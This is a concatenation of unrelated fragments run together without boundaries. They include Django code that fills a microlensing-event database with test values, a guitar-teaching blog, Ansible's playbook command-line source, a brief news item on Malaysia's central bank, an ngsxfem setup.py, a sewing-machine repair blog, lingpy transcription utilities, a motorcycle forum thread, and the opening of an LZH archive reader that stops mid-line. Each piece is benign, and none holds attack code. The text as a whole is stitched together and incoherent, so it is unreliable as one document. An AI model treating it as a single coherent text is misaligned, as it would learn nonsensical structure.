fov=fov, star_space=star_space, init_mthresh=init_mthresh, smooth_pro=smooth_pro, smooth_fwhm=smooth_fwhm, var_deg=var_deg, det_thresh=det_thresh, psf_thresh=psf_thresh, psf_size=psf_size, psf_comp_dist=psf_comp_dist, psf_comp_flux=psf_comp_flux, psf_corr_thresh=psf_corr_thresh, ker_rad=ker_rad, lres_ker_rad=lres_ker_rad, subframes_x=subframes_x, subframes_y=subframes_y, grow=grow, ps_var=ps_var, back_var=back_var, diffpro=diffpro) ev.save() successful = True else: successful = False return successful ################################################################################################################ def update_request(event_name, t_sample, exptime, timestamp=timezone.now(), onem_on=False, twom_on=False, request_type='M', which_filter='ip'): """ Update or Add robonet observing request to the database. Keyword arguments: event_name -- The event name. (string, required) e.g. "OGLE-2015-BLG-1234" t_sample -- Sampling interval to use. (in minutes) (float, required) exptime -- Exposure time to use. (in seconds) (integer, required) timestamp -- The request submission time. (datetime, optional, default=timezone.now()) e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>) onem_on -- Observe on 1m network? (boolean, optional, default=False) twom_on -- Observe on 2m network? (boolean, optional, default=False) request_type -- Observation request class (string, optional, default='M') ('T':'ToO','M':'Monitor', 'S':'Single') which_filter -- Filter identifier string. (string, optional, default='ip') """ if event_name.startswith("OGLE") and check_exists(event_name)==True: # Get event identifier ev = Event.objects.get(ev_name_ogle=event_name) ev.robonet_request_set.update_or_create(event=event_name, timestamp=timestamp, onem_on=onem_on, twom_on=twom_on, t_sample=t_sample, exptime=exptime, request_type=request_type, which_filter=which_filter) ev.save() successful = True elif event_name.startswith("MOA") and check_exists(event_name)==True: ev = Event.objects.get(ev_name_moa=event_name) ev.robonet_request_set.update_or_create(event=event_name, timestamp=timestamp, onem_on=onem_on, twom_on=twom_on, t_sample=t_sample, exptime=exptime, request_type=request_type, which_filter=which_filter) ev.save() successful = True elif event_name.startswith("KMT") and check_exists(event_name)==True: ev = Event.objects.get(ev_name_kmt=event_name) ev.robonet_request_set.update_or_create(event=event_name, timestamp=timestamp, onem_on=onem_on, twom_on=twom_on, t_sample=t_sample, exptime=exptime, request_type=request_type, which_filter=which_filter) ev.save() successful = True else: successful = False return successful ################################################################################################################ def update_status(event_name, timestamp=timezone.now(), priority='L', status='AC', comment='--', updated_by='--', omega=0.0): """ Update or Add robonet status to the database. Keyword arguments: event_name -- The event name. (string, required) e.g. "OGLE-2015-BLG-1234" timestamp -- The request submission time. (datetime, optional, default=timezone.now()) e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>) priority -- Priority flag for human observers. (A:anomaly, H:high, M:medium, L:low) (string, optional, default='L') status -- Event status. (CH:check, AC:active, AN:anomaly, RE:rejected, EX:expired) (string, optional, default='AC') comment -- Comment field. (string, optional, default='--') updated_by -- Updated by which user? (string, optional, default='--') omega -- Priority value calculated based on parameters. (float, optional, default=0.0) """ if event_name.startswith("OGLE") and check_exists(event_name)==True: # Get event identifier ev = Event.objects.get(ev_name_ogle=event_name) ev.robonet_status_set.update_or_create(event=event_name, timestamp=timestamp, priority=priority, status=status, comment=comment, updated_by=updated_by, omega=omega) ev.save() successful = True elif event_name.startswith("MOA") and check_exists(event_name)==True: ev = Event.objects.get(ev_name_moa=event_name) ev.robonet_status_set.update_or_create(event=event_name, timestamp=timestamp, priority=priority, status=status, comment=comment, updated_by=updated_by, omega=omega) ev.save() successful = True elif event_name.startswith("KMT") and check_exists(event_name)==True: ev = Event.objects.get(ev_name_kmt=event_name) ev.robonet_status_set.update_or_create(event=event_name, timestamp=timestamp, priority=priority, status=status, comment=comment, updated_by=updated_by, omega=omega) ev.save() successful = True else: successful = False return successful ################################################################################################################ ##TEST def run_test(): # Populate Event database from glob import glob ogle_event_list = glob('/work/Tux8/ytsapras/Data/RoboNet/ARTEMiS/PublishedParameters/2015/OGLE/*.model') count = 0 for i in ogle_event_list: data = open(i).read().split() ev_ra = data[0] ev_dec = data[1] event_name = data[2].replace('OB15','OGLE-2015-BLG-') add_new_event(event_name, ev_ra, ev_dec) count = count + 1 print count # Populate Ogle_Detail database from glob import glob ogle_event_list = glob('/work/Tux8/ytsapras/Data/RoboNet/ARTEMiS/PublishedParameters/2015/OGLE/*.model') count = 0 for i in ogle_event_list: data = open(i).read().split() event_name = data[2].replace('OB15','OGLE-2015-BLG-') Tmax = 2450000.0+float(data[3]) tau = float(data[5]) umin = float(data[7]) year, og_id = '20'+data[2][2:4], data[2].replace('OB15','blg-') url_link = 'http://ogle.astrouw.edu.pl/ogle4/ews/%s/%s.html' % (year, og_id) last_updated=timezone.now() ogle_details(event_name=event_name, Tmax=Tmax, tau=tau, umin=umin, url_link=url_link, last_updated=last_updated) count = count + 1 print count # Populate Data_File database from astropy.time import Time ogle_dat_list = glob('/work/Tux8/ytsapras/Data/RoboNet/ARTEMiS/data/*OB15*I.dat') count = 0 for i in ogle_dat_list: data = open(i).readlines() data = data[1:] if (data != []): event_name = i.split('/')[-1][1:-5].replace('OB15','OGLE-2015-BLG-') datafile = i last_upd = Time(float('245'+data[-1].split()[2]), format='jd').datetime last_upd = timezone.make_aware(last_upd, timezone.get_current_timezone()) last_mag = float(data[-1].split()[0]) ndat = len(data)-1 tel = i.split('/')[-1][0:1] ver = 1 update_data(event_name, datafile, last_upd, last_mag, tel, ver, ndat) count = count + 1 print count # Populate Robonet_Status database count = 0 ogle_events_list = Event.objects.filter(ev_name_ogle__contains="OGLE") for event_id in ogle_events_list: event_name = event_id.ev_name_ogle update_status(event_name, timestamp=timezone.now(), priority='L', status='AC', comment='--', updated_by='--') count = count + 1 print count # Populate Robonet_Request database import random count = 0 ogle_events_list = Event.objects.filter(ev_name_ogle__contains="OGLE") for event_id in ogle_events_list: event_name = event_id.ev_name_ogle t_sample = random.uniform(0.1,24.0) exptime = random.randint(10,300) update_request(event_name, t_sample, exptime, timestamp=timezone.now(), onem_on=False, twom_on=False, request_type='M', which_filter='ip') count = count + 1 print count # Populate Robonet_Log database import random count = 0 ogle_events_list = Event.objects.filter(ev_name_ogle__contains="OGLE") for event_id in ogle_events_list: event_name = event_id.ev_name_ogle image_name = "image_name.fits" timestamp = timezone.now() exptime = random.randint(10,300) filter1 = 'air' filter2 = 'ip' filter3 = 'air' telescope = '1m0-02' instrument = 'kb70' group_id = "RBN20150922T15.42112818" track_id = "0000110965" req_id = "0000427795" airmass = 1.33 fwhm = 6.45 sky_bg = 2143.5435347 sd_bg = 80.543 moon_sep = 18.43 elongation = 1.2345234 nstars = 120 quality = "Rejected: High FWHM of stars " update_log(event_name, image_name, timestamp, exptime, filter1, filter2, filter3, telescope, instrument, group_id, track_id, req_id, airmass, fwhm, sky_bg, sd_bg, moon_sep, elongation, nstars, quality) count = count + 1 print count # Populate Robonet_Reduction database count = 0 ogle_events_list = Event.objects.filter(ev_name_ogle__contains="OGLE") for event_id in ogle_events_list: event_name = event_id.ev_name_ogle lc_file = 'lc_'+event_name+'_ip.t' timestamp = timezone.now() version = 1 ref_image = 'reference.fits' update_reduction(event_name, lc_file, timestamp, version, ref_image, ron=0.0, gain=1.0, oscanx1=1, oscanx2=50, oscany1=1, oscany2=500, imagex1=51, imagex2=1000, imagey1=1, imagey2=1000, minval=1.0, maxval=55000.0, growsatx=0, growsaty=0, coeff2=1.0e-06, coeff3=1.0e-12, sigclip=4.5, sigfrac=0.5, flim=2.0, niter=4, use_reflist=0, max_nimages=1, max_sky=5000.0, min_ell=0.8, trans_type='polynomial', trans_auto=0, replace_cr=0, min_scale=0.99, max_scale=1.01, fov=0.1, star_space=30, init_mthresh=1.0, smooth_pro=2, smooth_fwhm=3.0, var_deg=1, det_thresh=2.0, psf_thresh=8.0, psf_size=8.0, psf_comp_dist=0.7, psf_comp_flux=0.1, psf_corr_thresh=0.9, ker_rad=2.0, lres_ker_rad=2.0, subframes_x=1, subframes_y=1, grow=0.0, ps_var=0, back_var=1, diffpro=0) count = count + 1 print count # Populate Single_Model database from glob import glob from astropy.time import Time ogle_event_list = glob('/work/Tux8/ytsapras/Data/RoboNet/ARTEMiS/model/OB15*.model') count = 0 for i in ogle_event_list: data = open(i).read().split() event_name = data[2].replace('OB15','OGLE-2015-BLG-') Tmax = 2450000.0+float(data[3]) e_Tmax = float(data[4]) tau = float(data[5]) e_tau = float(data[6]) umin = float(data[7]) e_umin = float(data[8]) if (data[12] != '0.0'): last_updated = Time(float('245'+data[12]), format='jd').datetime last_updated = timezone.make_aware(last_updated, timezone.get_current_timezone()) else: last_updated = timezone.now() single_lens_par(event_name, Tmax, e_Tmax, tau, e_tau, umin, e_umin, last_updated) count = count + 1 print count len(Event.objects.all()) def run_test2(): # Path to ARTEMiS files artemis = "/work/Tux8/ytsapras/Data/RoboNet/ARTEMiS/" # Color & site definitions for plotting colors = artemis+"colours.sig.cfg" colordef = artemis+"colourdef.sig.cfg" # Set up and populate dictionaries col_dict = {} site_dict = {} with open(colors) as f: for line in f: elem = line.split() key = elem[0] tel_id = " ".join([e.replace('"','') for e in elem[3:]]) vals = [elem[1], elem[2], tel_id] site_dict[key] = vals with open(colordef) as f: for line in f: elem = line.split() key = elem[0] val = elem[1] col_dict[key] = val # Populate Operator database for s in ['OGLE', 'MOA', 'KMTNet', 'WISE', 'MOA', 'OGLE', 'KMTNet', 'PLANET', 'RoboNet', 'uFUN', 'uFUN', 'Other']: add_operator(s) # Populate Telescope database from random import uniform for i in site_dict.keys(): tel_name = site_dict[i][-1] if ('LCOGT' in tel_name) or ('Liverpool' in tel_name): # Get the appropriate pk for RoboNet operator = Operator.objects.get(name='RoboNet') site = tel_name.split(' ')[1] elif 'OGLE' in tel_name: operator = Operator.objects.get(name='OGLE') site = 'CTIO' elif 'MOA' in tel_name: operator = Operator.objects.get(name='MOA') site = 'New Zealand' else: operator = Operator.objects.get(name='Other') site = '' aperture = uniform(1.0,2.0) add_telescope(operator=operator, telescope_name=tel_name, aperture=aperture, site=site) # Populate Instrument database for i in Telescope.objects.all().values(): inst = i['name']+' CCD camera' telescope = Telescope.objects.get(name=i['name']) pixscale = uniform(0.1,1.4) add_instrument(telescope=telescope, instrument_name=inst, pixscale=pixscale) # Add a few test instruments at existing telescopes telescope = Telescope.objects.get(name='LCOGT SAAO 1m A') inst = '!!!TEST SAA0 1m A NEW INST!!!' pixscale = uniform(0.1,1.4) add_instrument(telescope=telescope, instrument_name=inst, pixscale=pixscale) telescope = Telescope.objects.get(name='Faulkes North 2.0m') inst = '!!!TEST FTN 2.0m NEW INST!!!' pixscale = uniform(0.1,1.4) add_instrument(telescope=telescope, instrument_name=inst, pixscale=pixscale) telescope = Telescope.objects.get(name='LCOGT CTIO 1m A') inst = '!!!TEST CTIO 1m A NEW INST!!!' pixscale = uniform(0.1,1.4) add_instrument(telescope=telescope, instrument_name=inst, pixscale=pixscale) # Populate filter database filters = ['Bessell-U', 'Bessell-B', 'Bessell-V','Bessell-R','Bessell-I', 'SDSS-u', 'SDSS-g', 'SDSS-r', 'SDSS-i', 'SDSS-z', 'H-alpha'] for i in Instrument.objects.all(): for j in filters: add_filter(instrument=i, filter_name=j)
1) Recording the lessons is easy, both in audio and video. The student can later review the lesson, or practice with the recording if appropriate. 2) Zooming in on either hand is easy by moving the camera or the player around, both so the teacher can look at the student's hand, or vice-versa. 3) Re-scheduling due to traveling is reduced - students who are away can keep their regular lesson times, or find an alternate time for that week more easily. 4) Lessons are available to students who do not live in town. 5) The personal connection we expect to have in private lessons might take a little longer to set in, but after a couple of weeks things do feel great. Great Guitar Exercises You'll Never Do! Here I'll be discussing some excellent exercises that can really help your playing, but look, sound, or feel weird. Many of them are familiar, or make sense. We hear about them, and nod approvingly - and go on doing something else. Others just don't seem like they would be helpful, no matter we hear about them from amazing players. I'm posting each one as a comment. Take the tittle as a dare, and try out these suckers. For a while I have been asking my students to film the pieces they are playing and to send me those videos between lessons - specially when we don't meet every week. 1) If it's a new song, I can note-check their performance easily while it's stil slow, before any mis-readings become mechanized. Also the rhythm. 2) Body tension is very clear - you can say "at 2 minutes and 13 seconds your right shoulder locks up in anticipation of the arpeggio section - practice getting there, stop, relax, and continue." 3) It keeps the student accountable between lessons, discouraging cramming. 4) It is a brutal reality check that can be done privately - it all but eliminates the tendency some students have to play material that is too difficult too soon. I am just making the transition from recording to filming my own practice - I'll post my ideas as things work out. A good audio recording of your playing is a great practice tool. Everton Gloeden, from the Brazilian Guitar Quartet, once told me he thought it helped him so much he believed practicing without recording was a waste of his time! But how do we do it? It depends on what you want to get out of it. A simple way of starting off is playing through the music once, and then listening until something catches your ear. Pause the playback and work out that section, then move on. Don't dismiss any problem as a mere accident. If it really was just that, you won't spend much time working on it. Also, don't worry about sections that sound good in the recording, but that you've labeled as difficult in your mind. Use the recording as a reality check. Play slowly enough that you won't dismiss problems because it's so fast, or miss hearing them because it's too fast to notice. First, it's good material and a great way to get back into top playing shape for the summer. Second, Scott is coming to New Mexico to do a workshop and in case I can make it there, it would be great to be re-familiarized with his ideas.
# (c) 2012, Michael DeHaan <[email protected]> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. ######################################################## from __future__ import (absolute_import, division, print_function) __metaclass__ = type import os import stat from ansible.cli import CLI from ansible.errors import AnsibleError, AnsibleOptionsError from ansible.executor.playbook_executor import PlaybookExecutor from ansible.playbook.block import Block from ansible.playbook.play_context import PlayContext try: from __main__ import display except ImportError: from ansible.utils.display import Display display = Display() class PlaybookCLI(CLI): ''' the tool to run *Ansible playbooks*, which are a configuration and multinode deployment system. See the project home page (https://docs.ansible.com) for more information. ''' def parse(self): # create parser for CLI options parser = CLI.base_parser( usage="%prog [options] playbook.yml [playbook2 ...]", connect_opts=True, meta_opts=True, runas_opts=True, subset_opts=True, check_opts=True, inventory_opts=True, runtask_opts=True, vault_opts=True, fork_opts=True, module_opts=True, desc="Runs Ansible playbooks, executing the defined tasks on the targeted hosts.", ) # ansible playbook specific opts parser.add_option('--list-tasks', dest='listtasks', action='store_true', help="list all tasks that would be executed") parser.add_option('--list-tags', dest='listtags', action='store_true', help="list all available tags") parser.add_option('--step', dest='step', action='store_true', help="one-step-at-a-time: confirm each task before running") parser.add_option('--start-at-task', dest='start_at_task', help="start the playbook at the task matching this name") self.parser = parser super(PlaybookCLI, self).parse() if len(self.args) == 0: raise AnsibleOptionsError("You must specify a playbook file to run") display.verbosity = self.options.verbosity self.validate_conflicts(runas_opts=True, vault_opts=True, fork_opts=True) def run(self): super(PlaybookCLI, self).run() # Note: slightly wrong, this is written so that implicit localhost # Manage passwords sshpass = None becomepass = None passwords = {} # initial error check, to make sure all specified playbooks are accessible # before we start running anything through the playbook executor for playbook in self.args: if not os.path.exists(playbook): raise AnsibleError("the playbook: %s could not be found" % playbook) if not (os.path.isfile(playbook) or stat.S_ISFIFO(os.stat(playbook).st_mode)): raise AnsibleError("the playbook: %s does not appear to be a file" % playbook) # don't deal with privilege escalation or passwords when we don't need to if not self.options.listhosts and not self.options.listtasks and not self.options.listtags and not self.options.syntax: self.normalize_become_options() (sshpass, becomepass) = self.ask_passwords() passwords = {'conn_pass': sshpass, 'become_pass': becomepass} loader, inventory, variable_manager = self._play_prereqs(self.options) # (which is not returned in list_hosts()) is taken into account for # warning if inventory is empty. But it can't be taken into account for # checking if limit doesn't match any hosts. Instead we don't worry about # limit if only implicit localhost was in inventory to start with. # # Fix this when we rewrite inventory by making localhost a real host (and thus show up in list_hosts()) hosts = CLI.get_host_list(inventory, self.options.subset) # flush fact cache if requested if self.options.flush_cache: self._flush_cache(inventory, variable_manager) # create the playbook executor, which manages running the plays via a task queue manager pbex = PlaybookExecutor(playbooks=self.args, inventory=inventory, variable_manager=variable_manager, loader=loader, options=self.options, passwords=passwords) results = pbex.run() if isinstance(results, list): for p in results: display.display('\nplaybook: %s' % p['playbook']) for idx, play in enumerate(p['plays']): if play._included_path is not None: loader.set_basedir(play._included_path) else: pb_dir = os.path.realpath(os.path.dirname(p['playbook'])) loader.set_basedir(pb_dir) msg = "\n play #%d (%s): %s" % (idx + 1, ','.join(play.hosts), play.name) mytags = set(play.tags) msg += '\tTAGS: [%s]' % (','.join(mytags)) if self.options.listhosts: playhosts = set(inventory.get_hosts(play.hosts)) msg += "\n pattern: %s\n hosts (%d):" % (play.hosts, len(playhosts)) for host in playhosts: msg += "\n %s" % host display.display(msg) all_tags = set() if self.options.listtags or self.options.listtasks: taskmsg = '' if self.options.listtasks: taskmsg = ' tasks:\n' def _process_block(b): taskmsg = '' for task in b.block: if isinstance(task, Block): taskmsg += _process_block(task) else: if task.action == 'meta': continue all_tags.update(task.tags) if self.options.listtasks: cur_tags = list(mytags.union(set(task.tags))) cur_tags.sort() if task.name: taskmsg += " %s" % task.get_name() else: taskmsg += " %s" % task.action taskmsg += "\tTAGS: [%s]\n" % ', '.join(cur_tags) return taskmsg all_vars = variable_manager.get_vars(play=play) play_context = PlayContext(play=play, options=self.options) for block in play.compile(): block = block.filter_tagged_tasks(play_context, all_vars) if not block.has_tasks(): continue taskmsg += _process_block(block) if self.options.listtags: cur_tags = list(mytags.union(all_tags)) cur_tags.sort() taskmsg += " TASK TAGS: [%s]\n" % ', '.join(cur_tags) display.display(taskmsg) return 0 else: return results def _flush_cache(self, inventory, variable_manager): for host in inventory.list_hosts(): hostname = host.get_name() variable_manager.clear_facts(hostname)
A central bank cannot operate in isolation, adds Nor Shamsiah. Nor Shamsiah Mohd Yunus is a former official who probed 1MDB under then governor Zeti. The bank's former deputy governor is widely-tipped to return.
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import os import re import sys import platform import subprocess from setuptools import setup, Extension from setuptools.command.build_ext import build_ext from distutils.version import LooseVersion class CMakeExtension(Extension): def __init__(self, name, sourcedir=''): Extension.__init__(self, name, sources=[]) self.sourcedir = os.path.abspath(sourcedir) class CMakeBuild(build_ext): def run(self): try: out = subprocess.check_output(['cmake', '--version']) except OSError: raise RuntimeError("CMake must be installed to build the following extensions: " + ", ".join(e.name for e in self.extensions)) if platform.system() == "Windows": cmake_version = LooseVersion(re.search(r'version\s*([\d.]+)', out.decode()).group(1)) if cmake_version < '3.1.0': raise RuntimeError("CMake >= 3.1.0 is required on Windows") for ext in self.extensions: self.build_extension(ext) def build_extension(self, ext): extdir = os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name))) # required for auto-detection of auxiliary "native" libs if not extdir.endswith(os.path.sep): extdir += os.path.sep cmake_args = ['-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=' + extdir, '-DPYTHON_EXECUTABLE=' + sys.executable, '-DCMAKE_CXX_COMPILER=ngscxx', '-DCMAKE_LINKER=ngsld', '-DBUILD_STUB_FILES=ON', '-DBUILD_NGSOLVE=OFF'] cfg = 'Debug' if self.debug else 'Release' build_args = ['--config', cfg] if platform.system() == "Windows": #not expected to work... (but who knows..) cmake_args += ['-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_{}={}'.format(cfg.upper(), extdir)] if sys.maxsize > 2**32: cmake_args += ['-A', 'x64'] build_args += ['--', '/m'] else: cmake_args += ['-DCMAKE_BUILD_TYPE=' + cfg] build_args += ['--', '-j2'] env = os.environ.copy() env['CXXFLAGS'] = '{} -DVERSION_INFO=\\"{}\\"'.format(env.get('CXXFLAGS', ''), self.distribution.get_version()) if not os.path.exists(self.build_temp): os.makedirs(self.build_temp) subprocess.check_call(['cmake', ext.sourcedir] + cmake_args, cwd=self.build_temp, env=env) subprocess.check_call(['cmake', '--build', '.'] + build_args, cwd=self.build_temp) subprocess.check_call(['mv', 'ngsxfem_py.so', 'xfem'], cwd=self.build_lib) setup( name='xfem', version='2.0', author='Christoph Lehrenfeld', author_email='[email protected]', description='(ngs)xfem is an Add-on library to Netgen/NGSolve for unfitted/cut FEM.', long_description='(ngs)xfem is an Add-on library to Netgen/NGSolve which enables the use of unfitted finite element technologies known as XFEM, CutFEM, TraceFEM, Finite Cell, ... . ngsxfem is an academic software. Its primary intention is to facilitate the development and validation of new numerical methods.', url="https://github.com/ngsxfem/ngsxfem", ext_modules=[CMakeExtension('ngsxfem_py')], cmdclass=dict(build_ext=CMakeBuild), packages=["xfem"], package_dir={"xfem": "python"}, python_requires='>=3.5', )
Today’s adventure was pretty straight forward for a change. I decided to install the upright arm shaft, which is the shaft with gears that connects the lower gear shaft with the upper gear shaft. A picture is below and a link to the disassembly of this baby is here. The upper gear is the smaller one, and that is the one that I took off to insert into the arm of the machine. The photo below shows the “flat” of the shaft where one of the set screws of the gear should rest against when it is reassembled. If I haven’t mentioned it before, I’m lightly oiling all the parts with regular sewing machine oil before assembly. This helps the parts slide together easier and adds a little protection from rust. Here are photos of the bottom of Ms. Rusty and they show the “before” and “after” shots. It’s easier to show pictures than try to describe where to insert the shaft. Now here is a photo of the top end of the shaft, as seen through the arm side cover opening. What this photo is intended to show is that it is not possible to attach the top gear to the shaft without first moving the gear on the horizontal arm shaft out of the way. That is why I didn’t worry too much about exact placement when this gear was initially installed. After the horizontal gear is pushed back a bit, then the upright gear can be put on. This can be a bit awkward for one person to do since you have to push up on the shaft while aligning the gear over the hole, and then tightening the screw. To solve this problem, I propped up the shaft at the bottom with a small box of toothpicks and then it went pretty smoothly. An alternative would be to have a helper or a third hand, but I had neither at the time You can tell the gear is in proper position on the shaft when, using the words of the Singer Adjuster Manual, the end of the the shaft is approximately flush with the face of the gear. The next step is to bring the gear of the horizontal arm shaft and put it in mesh with the gear of the upper arm shaft. It helps to have a pair of bent nose pliers for this step to pull and hold the horizontal gear into place to tighten the set screws. The photo below shows the completed assembly. Then I rotated the shafts at the balance wheel hub to make sure everything was turning smoothly and nothing was binding. The adjusters manual warns that the gears should not be pressed too tightly against the bushings as this could “retard the free rotation of the upright arm shaft”. When I was sure everything was working the way it should be (at least as far as I could tell), I applied grease to the gears and did a few more rotations to work the grease into the gears. I want to make sure those babies are ready for the big show when the time comes! Next time I’ll tackle the connecting rods. Oooooo – what fun!
import re from lingpy.sequence.sound_classes import ipa2tokens, tokens2class def make_sample_id(gloss_id, lang1, lang2, index1, index2): """ Sample IDs should uniquely identify a feature row. Sample sample ID: 98/English,German/1,1 """ assert lang1 < lang2 s = str(gloss_id) + '/' s += lang1 +','+ lang2 + '/' s += str(index1) +','+ str(index2) return s def explode_sample_id(sample_id, langs): """ Returns (gloss, lang1, lang2, index1, index2). Expects the set of all possible langs as second argument. Note: some datasets contain language names with chars such as: `/`, `,`. """ gloss = sample_id.split('/')[0] lang_part = sample_id.split('/', maxsplit=1)[1] lang_part = lang_part.rsplit('/', maxsplit=1)[0] for lang1 in langs: if lang_part.startswith(lang1+','): lang2 = lang_part[len(lang1)+1:] if lang2 in langs: break assert lang1 in langs assert lang2 in langs key1, key2 = sample_id.rsplit('/', maxsplit=1)[1].split(',') key1, key2 = int(key1) - 1, int(key2) - 1 return gloss, lang1, lang2, key1, key2 def clean_asjp(word): """ Removes ASJP diacritics. """ word = re.sub(r",","-",word) word = re.sub(r"\%","",word) word = re.sub(r"\*","",word) word = re.sub(r"\"","",word) word = re.sub(r".~","",word) word = re.sub(r"(.)(.)(.)\$",r"\2",word) word = re.sub(r" ","-",word) return word def ipa_to_asjp(w, params): """ Lingpy IPA-to-ASJP converter plus some cleanup. Expects the params {} to contain the key: sounds. This function is called on IPA datasets. """ w = w.replace('\"','').replace('-','').replace(' ','') wA = ''.join(tokens2class(ipa2tokens(w, merge_vowels=False), 'asjp')) wAA = clean_asjp(wA.replace('0','').replace('I','3').replace('H','N')) asjp = ''.join([x for x in wAA if x in params['sounds']]) assert len(asjp) > 0 return asjp def asjp_to_asjp(w, params): """ Cleans up the ASJP string and filters it to include the chars specified in the sounds parameter. This function is called on ASJP datasets. """ w = w.replace('\"','').replace('-','').replace(' ','') wAA = clean_asjp(w.replace('0','').replace('I','3').replace('H','N')) asjp = ''.join([x for x in wAA if x in params['sounds']]) assert len(asjp) > 0 return asjp def is_asjp_data(data): """ Expects {lang: {gloss: [transcription,]}}. Checks whether the translation strings are ASCII. """ return all([len(s.encode()) == len(s) for lang in data.values() for trans in lang.values() for s in trans ])
If it stays mild like it is, I might venture out on the Mighty Transalp either Tomoz or Friday if any fool be interested. Fish & Chips?? Always interested in fish and chips. . But my steed won't be seeing the road anytime soon I'm afraid. Rekon it's not worth takin ma machine oot on the salty roads, nae idea yet of whit wee nooks the muck gathers in yet. This wiz the oil cooler after a ride tae Mallaig in the autumn. The backside of the front guards. The rad after I pulled off most of the Krud. If me new lid comes soon I'm nipping out for a rip. Both Arais now deader than a dead thing. Piles of shite they are. Well, I had too long a lie-in today and so didn't get organised, then I found out my sister's coming up for her annual visit on Friday. Which lid did you go for? My mate bought one of them HJC flip fronts at the show and they look 1/2 decent? Pounce,,,,,,,,,,,,,,,,,,,,,,,jings that conjures up a tortured pic or two. Anyhoo here's a nice one and remember, read the full description before hitting the buy it now button. He needs one WITH hair. Nob mate...just pull the trigger on the one you've already tried. They won't be coming up in the sales over the next few months.
# -*- coding:utf-8 -*- # Copyright (c) 2010 Hidekazu Ohnishi. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following # disclaimer in the documentation and/or other materials provided # with the distribution. # # * Neither the name of the author nor the names of its contributors # may be used to endorse or promote products derived from this # software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """Lhafile, extension extract lzh file. Its interface is likey zipfile module is include in regular python environment. """ from __future__ import unicode_literals try: from cStringIO import BytesOrStringIO except ImportError: from io import BytesIO as BytesOrStringIO import datetime import os import os.path import struct import sys import lzhlib crc16 = lzhlib.crc16 if sys.version_info[0] == 3: string_types = (str,) def ord(v): return v else: string_types = (basestring,) def unpack(format, data): return struct.unpack(str(format), data) def is_lhafile(filename): try: LhaFile(filename) except: return False return True class BadLhafile(Exception): pass class LhaInfo(object): __slots__ = ( 'orig_filename', 'filename', 'directory', 'date_time', 'compress_type', 'comment', 'extra', 'create_system', 'create_version', 'extract_version', 'reserved', 'flag_bits', 'volume', 'internal_attr', 'external_attr', 'header_offset', 'file_offset', 'CRC', 'compress_size', 'file_size', ) def __init__(self): self.orig_filename = None self.filename = None self.directory = None self.date_time = None self.compress_type = None self.comment = None self.extra = None self.create_system = None self.create_version = None self.extract_version = None self.reserved = None self.flag_bits = None self.volume = None self.internal_attr = None self.external_attr = None self.header_offset = None self.file_offset = None self.CRC = None self.compress_size = None self.file_size = None def __str__(self): return '%s %s %08X %d %04X' % (self.filename, self.file_size, self.file_offset, self.compress_size, self.CRC) def __getstate__(self): return (self.orig_filename, self.filename, self.directory, self.date_time, self.compress_type, self.comment, self.extra, self.create_system, self.create_version, self.extract_version, self.reserved, self.flag_bits, self.volume, self.internal_attr, self.external_attr, self.header_offset, self.file_offset, self.CRC, self.compress_size, self.file_size) def __setstate__(self, state): (self.orig_filename, self.filename, self.directory, self.date_time, self.compress_type, self.comment, self.extra, self.create_system, self.create_version, self.extract_version, self.reserved, self.flag_bits, self.volume, self.internal_attr, self.external_attr, self.header_offset, self.file_offset, self.CRC, self.compress_size, self.file_size) = state class LhaFile(object): """ """ SUPPORTED_COMPRESS_TYPE = (b'-lhd-', b'-lh0-', b'-lh5-', b'-lh6-', b'-lh7-') def __init__(self, file, mode="r", compression=None, callback=None, args=None): """ Open the LZH file """ self.filelist = [] self.NameToInfo = {} self.mode = key = mode.replace('b', '')[0] if isinstance(file, string_types): self._fileParsed = 0 self.filename = file modeDict = {'r' : 'rb'} self.fp = open(file, modeDict[mode]) else: self._fileParsed = 1 self.fp = file self.filename = getattr(file, 'name', None) # Get file size initial_pos = self.fp.tell() self.fp.seek(0, 2) self.filesize = self.fp.tell() self.fp.seek(initial_pos, 0) if key == 'r': self._GetContents(callback=callback,args=args) else: if not self._fileParsed: self.fp.close() self.fp = None raise RuntimeError("Mode must be 'r'") def _GetContents(self, callback=None, args=None): try: info = self._RealGetContent() while info: if not info.compress_type in Lhafile.SUPPORTED_COMPRESS_TYPE: raise RuntimeError("Unsupported file is contained %s" % (info.compress_type,)) if callback: callback(args, self.fp.tell(), self.filesize, info) self.filelist.append(info) self.NameToInfo[info.filename] = info info = self._RealGetContent() except BadLhafile as e: raise if not self._fileParsed: self.fp.close() self.fp = None def _RealGetContent(self): fp = self.fp filesize = self.filesize initial_pos = 